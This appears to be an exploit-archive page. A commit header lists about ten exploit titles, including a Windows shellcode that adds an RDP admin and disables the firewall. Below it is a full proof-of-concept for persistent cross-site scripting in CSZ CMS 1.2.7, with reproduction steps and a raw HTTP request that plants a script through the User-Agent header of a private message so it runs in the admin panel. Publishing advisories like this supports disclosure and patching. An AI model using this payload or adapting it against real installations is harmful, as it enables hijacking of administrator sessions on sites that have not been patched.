1c5c38825d
10 changes to exploits/shellcodes Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation WordPress 2.0.2 - 'cache' Remote Shell Injection Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption WordPress Core 2.0.2 - 'cache' Remote Shell Injection CSZ CMS 1.2.7 - Persistent Cross-Site Scripting PMB 5.6 - 'logid' SQL Injection CSZ CMS 1.2.7 - 'title' HTML Injection IQrouter 3.3.1 Firmware - Remote Code Execution NSClient++ 0.5.2.35 - Authenticated Remote Code Execution jizhi CMS 1.6.7 - Arbitrary File Download P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin) Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)
32 lines
No EOL
1.1 KiB
Text
32 lines
No EOL
1.1 KiB
Text
# Exploit Title: CSZ CMS 1.2.7 - Persistent Cross-Site Scripting
|
|
# Exploit Author: Metin Yunus Kandemir
|
|
# Vendor Homepage: https://www.cszcms.com/
|
|
# Software Link: https://sourceforge.net/projects/cszcms/
|
|
# Version: v1.2.7
|
|
# Description:
|
|
# Unauthorized user that has access private message can embed Javascript
|
|
# code to admin panel.
|
|
|
|
# Steps to reproduce:
|
|
1- Log in to member panel.
|
|
1- Change user-agent header as <script>alert(1)</script>
|
|
2- Send the private message to admin user.
|
|
3- When admin user logs in to Backend System Dashboard, an alert box pops
|
|
up on screen.
|
|
|
|
PoC Request:
|
|
|
|
POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: <script>alert(1)</script>
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 152
|
|
Cookie: cszcookie
|
|
Connection: close
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=user-agent&message=user-agent&submit=Send |